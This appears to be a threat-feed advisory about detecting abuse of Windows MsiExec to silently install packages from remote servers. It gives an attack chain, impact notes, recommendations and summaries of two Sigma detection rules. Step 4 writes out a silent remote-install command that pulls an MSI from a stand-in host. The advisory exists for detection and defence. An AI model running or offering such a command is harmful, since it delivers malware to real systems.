Skip to content
Threat Feed
high advisory

Potential Remote Install via MsiExec

Adversaries may abuse Windows Installers via MsiExec to install files from remote servers for initial access and delivery of malware, which is detected by identifying MsiExec processes with network connections and specific command-line arguments.

Attackers may exploit the Windows utility MsiExec to execute malicious payloads disguised as legitimate installations. This involves using MsiExec to install files from a remote server, a technique employed for initial access and malware delivery. The Elastic detection rule, published on 2026-04-20, identifies suspicious child processes spawned by MsiExec that initiate network activity, which is atypical for standard installations. This activity is detected using EQL queries that examine process names, command-line arguments, and parent processes. The rule specifically looks for msiexec.exe processes with arguments indicating remote installation (e.g., -i*, /i*) and network access (*http*), while also excluding legitimate software update processes. This activity matters because it bypasses traditional security measures by abusing a trusted system utility.

Attack Chain

  1. An attacker gains initial access through a phishing email or compromised website.
  2. The user unknowingly executes a malicious file (e.g., via script interpreter or macro).
  3. The malicious file executes a command to run msiexec.exe.
  4. msiexec.exe is invoked with command-line arguments to install a package from a remote server (e.g., msiexec.exe /i http://example.com/malicious.msi /qn). The /qn flag ensures the installation runs silently.
  5. MsiExec downloads the malicious MSI package from the remote server.
  6. The MSI package executes embedded malicious code, potentially gaining elevated privileges.
  7. The malicious code establishes a reverse shell or downloads further payloads.
  8. The attacker achieves command and control, enabling them to perform actions like data exfiltration or lateral movement.

Impact

Successful exploitation can lead to complete system compromise, allowing attackers to install malware, steal sensitive data, or disrupt business operations. The number of victims can range from single machines to entire networks, depending on the attacker's objectives. Sectors most commonly targeted include healthcare, finance, and government, due to the sensitive data they hold. If the attack succeeds, the organization may face significant financial losses, reputational damage, and legal consequences.

Recommendation

  • Deploy the Sigma rule "MsiExec Remote Payload Installation" to your SIEM to detect suspicious MsiExec activity (see rule configuration below).
  • Enable Sysmon process-creation logging to provide the necessary process metadata for the Sigma rule to function effectively.
  • Review and tune the Sigma rule's exclusion list to prevent false positives from legitimate software installations.
  • Monitor network connections initiated by msiexec.exe processes to identify unauthorized network activity.
  • Implement application control policies to restrict the execution of msiexec.exe to authorized users and processes only.
  • Investigate any alerts generated by the Sigma rule immediately to determine the scope and impact of the potential attack.

Detection coverage 2

MsiExec Remote Payload Installation

high

Detects MsiExec processes attempting to install packages from remote URLs, indicating potential malware installation.

sigma tactics: command_and_control, defense_evasion techniques: T1105, T1218.007 sources: process_creation, windows

MsiExec Suspicious Parent Process

medium

Detects MsiExec being run from suspicious parent processes.

sigma tactics: defense_evasion techniques: T1218.007 sources: process_creation, windows

Detection queries are available on the platform. Get full rules →